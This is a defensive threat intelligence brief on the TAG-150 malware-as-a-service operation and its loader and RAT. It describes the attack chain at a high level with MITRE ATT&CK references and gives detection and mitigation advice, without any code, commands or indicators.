Executive Summary

On November 29, 2025, security researchers published a report on an ongoing malware campaign orchestrated by a Malware-as-a-Service (MaaS) group identified as TAG-150. The group has been active since at least March 2025, providing its criminal clientele with a malware toolkit designed for information theft. The core components of their service are a modular loader and a Remote Access Trojan (RAT). The loader is responsible for the initial infection and can flexibly download different modules or the final RAT payload, which then gives the attacker control over the compromised system. This operation underscores the professionalization of cybercrime through the MaaS model, lowering the barrier to entry for less skilled actors.

Threat Overview

TAG-150 operates as a commercial enterprise on the dark web, selling or leasing its malware to other criminals. Their product is designed for stealth and flexibility. The campaign relies on user interaction for the initial infection, likely through phishing emails with malicious attachments or links. The malware itself uses living-off-the-land techniques to better blend in with normal system activity and evade detection by traditional security products. The ultimate goal of the campaign is not immediate disruption like ransomware, but long-term access for data theft, credential harvesting, and potentially selling that access to other threat actors.

Technical Analysis

The attack chain facilitated by TAG-150's MaaS offering follows a common pattern:

1. Delivery: The initial loader is delivered via a social engineering vector, such as a malicious document in a phishing email (T1566.001 - Spearphishing Attachment).
2. Execution: The user is tricked into opening the attachment, which executes the loader, often using macros (T1204.002 - Malicious File).
3. Modular Loading: The loader establishes a connection to a C2 server (T1105 - Ingress Tool Transfer) to download additional modules or the final RAT payload. This modularity allows the attacker to tailor the malware to the specific target environment.
4. Command and Control: Once the RAT is installed, it provides the attacker with remote control over the victim's machine (T1219 - Remote Access Software), allowing for keylogging, file system access, and data exfiltration.

Impact Assessment

• Democratization of Cybercrime: The primary impact of MaaS providers like TAG-150 is that they lower the technical skill required to launch effective cyberattacks, leading to a greater volume of threats.
• Information Theft: Victims of this campaign are at risk of having sensitive personal and financial information, login credentials, and proprietary business data stolen.
• Gateway for Further Attacks: A system compromised by this RAT can be used as a foothold to launch more severe attacks, including ransomware deployment or as part of a botnet.

Detection & Response

• Process Monitoring: Use an EDR to monitor for suspicious process chains, such as Microsoft Office applications spawning PowerShell or cmd.exe. This is a key opportunity for Process Analysis.
• Network Monitoring: Analyze outbound network traffic for signs of C2 beaconing. Look for periodic, small connections to unknown domains or IP addresses. Use Network Traffic Analysis to spot these patterns.
• File Hashing: Once IOCs (file hashes) for the loader and RAT components are available, they can be used to scan the environment for existing infections. This is a form of File Hashing.

Mitigation

• Email Security: Deploy an advanced email security solution that can sandbox attachments and scan links to block the initial delivery vector.
• User Training: Train users to be suspicious of unsolicited attachments and to never enable macros in documents from untrusted sources. This is part of M1017 - User Training.
• Attack Surface Reduction: Configure Microsoft Office applications to block macros from documents downloaded from the internet. Use Attack Surface Reduction (ASR) rules to block Office applications from creating child processes.
• Application Control: Use Executable Allowlisting to prevent unknown loaders and RATs from executing on endpoints.